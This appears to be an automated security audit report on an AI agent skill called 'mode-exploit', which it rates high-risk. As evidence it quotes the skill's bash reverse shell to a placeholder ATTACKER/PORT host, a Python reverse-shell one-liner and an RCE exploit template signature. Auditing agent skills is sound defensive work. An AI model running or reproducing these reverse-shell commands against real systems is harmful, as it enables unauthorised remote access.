mode-exploit
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill provides functional code payloads for establishing reverse shells in both Bash and Python environments. These commands are used to gain unauthorized command-line access to remote systems.\n
- Evidence (SKILL.md): bash -i >& /dev/tcp/ATTACKER/PORT 0>&1\n
- Evidence (SKILL.md): python3 -c 'import socket,subprocess,os;...subprocess.call(["/bin/sh","-i"])'\n- REMOTE_CODE_EXECUTION (HIGH): The Python template included in the skill is explicitly designed to facilitate Remote Code Execution (RCE). It allows for arbitrary commands to be passed and executed on a target host.\n
- Evidence (SKILL.md): def exploit(target: str, cmd: str = "id")\n- PROMPT_INJECTION (LOW): The skill presents a surface for indirect prompt injection by accepting untrusted input for command execution without sanitization.\n
- Ingestion points: Python template in SKILL.md (target, cmd arguments).\n
- Boundary markers: Absent.\n
- Capability inventory: Network operations (requests) and shell execution (subprocess).\n
- Sanitization: Absent.
Recommendations
- AI detected serious security threats
Audit Metadata